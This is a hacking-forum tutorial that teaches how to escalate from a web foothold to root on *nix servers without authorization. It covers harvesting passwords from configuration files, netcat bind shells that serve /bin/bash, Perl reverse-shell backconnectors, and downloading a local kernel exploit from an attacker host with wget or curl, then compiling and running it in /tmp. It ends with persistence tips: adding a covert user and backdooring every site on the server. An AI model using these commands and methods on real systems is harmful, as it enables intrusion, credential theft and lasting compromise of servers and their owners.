Ultimate Guide to Server Rooting

[x] What should I expect from this tutorial?

- This tutorial is to show you the easy ways of gaining root access to a *nix server.
most people think its quiet hard to do so, well I am trying to prove the opposite.

[x] I am interested, go on...

- Okay, you should know atleast some basics of webhacking, to gain access to the server you want to root.
if you have no idea, or never gained access to a server before, I suggest you read some WebHacking tutorials like sqli,dnn,lfi and rfi etc.

I will start with some of the things you need to know in order to start rooting servers::

- Using a shell, have a good background on *nix commands, and know your way around a *nix server.

[ You can learn all that locally, by just installing a *nix distro, and playing around with it. ]
- How to use NetCat, and listen / connect to servers using it.
[ I will cover that in this tutorial ]
- as mentioned earlier, you must have atleast the basics of webhacking covered, how to gain access to a server. etc..
[ Read some WebHacking tutorials, I made a very basic one with alot of examples covering the most used attacking vectors ]

Those are the basic requriements that you should cover before starting reading this tutorial, if you feel you got one missing, lookup some tutorials on it, or you can ask me

[x] How much access you have?

- You cant just root a server if you have a XSS on that server, unless you take that XSS to the extreme and phish with it, but thats another story.
so, we need atleast ability to upload / download / include our code, or even just exeucute it.

Once we got the ability to execute commands on that server, we start checking for things, this is my own checklist that I do on every server. its just a habit now::

Check the /etc/passwd file for the users with SSH access, how do I know which have and which does not?
simple, by using `cat` to get the contents of that file, you will see the users on the server in this form:

[1] [2] [3]

[1] - The usersname | good for us to know the user to be used on cPanels, FTPs, and SSH...

[2] - Home of that username | good for cross server hacks, where you need to get to that users files.

[3] - Shell access | If it was anything other than :


Most probably it means no shell / SSH access for that user.

Now, why are we looking for users with SSH access?

Because it would make it much easier to work on that server with SSH access, to execute commands faster etc..

Now lets say the user `user` got SSH access, we can go to his `home` and look for config files, passwords, backups, anything that will have a password.

and then try it on SSH, with the user `user` and the pass that we found, if you are lucky, you will get access

[ Not going to explain what to do next, cause we still need to complete the checklist ]

Allright, so none of the users got SSH access... we cant just give up now can we?

If the hosting company is not that big, or if it was a private server, VPS, dedicated server, most likely the main site of the hosting is on the same server...

that is a great thing to have, so we do a simple WHOIS on the server, and check out the host, and then try to find the home dir...

Now most hosting, will have a billing software, or some system check panels, etc. all of those needs a high user access to the server, so in most cases you will find the password of admin access in plaintext,

we will be looking for config files, how to do so?

well, we moved to the hosts home right, lets check there files...

by listing the files there, we can see they have a folder called `billing`, lets check that out...

the first step, is to get the contents of the index, and look for the included files, most cases its just clear that this file is a config file from the name.

it will be something like:



by getting the contents of that file, we can get the password, and try it on that user, on SSH, cPanel, FTP.

[ No luck... next... ]

The hosting company has there files on another server, there are no backups whatsoever, and you are getting desprete by now...

NetCat comes to the rescue!, NetCat the TCP/IP swiss army knife should be always in your pocket `flash drive or whatever you use`, it is very usefull..

as I promised, I will explain about the usage of NetCat.. so here we go::

[ Windows ]

After downloading NetCat, open up your CMD, and move to the dir that it is located.

The commands you would need are:

nc -vv -l -p 5555

This will make NetCat listen on port 5555, verbosely `telling you exactly what is going on`. that simple eh?

nc -vv -L -p 5555

Same thing, but with a capital L, makes it listen and once disconnected, listen again, and again.. etc...

nc darkmindz.com 80

Connect to darkmindz.com on port 80.

nc -vv -l -p 5555 -e cmd.exe

Okay, you dont want to do that on your own PC, this would listen on port 5555, and once someone connects, it would open up cmd for them...

[ Thats all you need to know about NetCat for now ]

[ *nix ]

Downloaded NetCat, compiled it, and ready to go...

same commands, now the only difference is, since most webservers are *Nix, you will need to use it as a `backdoor`, by using this command:

./nc -vv -l -p 5555 -e /bin/bash

once connected, you got a bash command line on that server

allright, where does that leaves us.. we still need to get a better way to execute commands on the server, and all our trials to get SSH access failed...

Now we are going to move into, Backconnecting and Backdooring...

[ Backconnecting ]

A simple definition would be:

Making the server connect to you.


If the server was firewalled, or had some kind of security against remote connections, you cant use that method...


Well, you can code your own backconnector, it is not that hard, if you know C or Perl. but if you dont, you can always use the lots of backconnectors out there.

The most used tool, `atleast by me`, is the iranian backconnnector, and the cyberlab. both are in perl, and both work like a charm.

ofcourse perl should be installed on that server to be able to use those, if perl is installed, all you need to do is::

use NetCat on your PC to listen to a port...

nc -vv -l -p 5555

then, on that server, follow the instructions of your backconnector, most likely it is::

perl shos.pl your_ip_here 5555

if it connected, you will see it on your screen, saying connected, and you can start executing commands

otherwise, you can try a C backconnect tool.. same concept, just compile and run...

[ Backdooring ]

Backdooring, is opening a port on the server, to connect to...

You can use NetCat in this case, and run the command:

./nc -vv -l -p 5555 -e /bin/bash

then connect to the server using NetCat.. done..

or use some bind shells, wont work on alot of servers, they started banning the process... but if it works, great!

[x] So, we have been talking about how to get more access to execute commands all day now, whats next?!

Right, so backups were not found, host is not on the same server, and if it was, all the passwords are either invalid or encrypted.

Now we move into some kernel exploits, and using the server to the max.

atleast by now, you should have a command line access, SSH, Backconnect, Backdoor, whatever it was...

so now you can easily execute commands on the server, but what would you do exactly?

Now its time to get info on the server, kernel, processes, services, and then look for vulnerabilities.

we always start by the kernel, so get the kernel version by:

uname -a

it would output the hostname, OS, and then the kernel version, now we need to find an exploit for that kernel..

a good website for kernel exploits is: exploit-db.com

lets say you found the kernel exploit, now we need to run it, how?

lets move to a dir that no one usually look in it, and that is /tmp/.

now, we are going to download that exploit, we can use wget for that:

wget http://yoursite.com/local.c
if it says /bin/wget access denied, dont worry, we can always cURL:

curl http://yoursite.com/local.c -o new_name

if that doesnt work either, remember your shell? well use it to upload that exploit in /tmp/.

before running it, check if its compiled or not, you can check that by viewing the source code.

if it was not compiled, `most probably the extension would be .c`, then you need to compile it:

gcc name.c -o newname

now to run it, we first need to give it execution perms, so we chmod it to 777

chmod 777 new_name

allright, now lets hope this works and run it..


you can check if it works by checking your id, or whoami, and if it says root. you are good to go

allright, we covered the basic basics of getting root on a server, rooting is not that hard, some attacking methods are hard, like BoF's, you need C knowledge to be able to debug and exploit the processes...

[x] I dont want to loose the root!!

No one does, but alot makes stupid mistakes that will take the root away from them...

Rule #1 and the most important is : You NEVER change the roots pass, NEVER EVER!

Create a new user, with SSH access. check the useradd command for more info.

If you used a local root exploit, make sure you have other copies of it on that server, you might need it again.

Backdoor every single site on the server, with a simple PHP-Shell backdoor:

Please +REP Me if You Enjoyed My Tutorial

Post a Comment

M14 Network Inc. | Hassnain Arts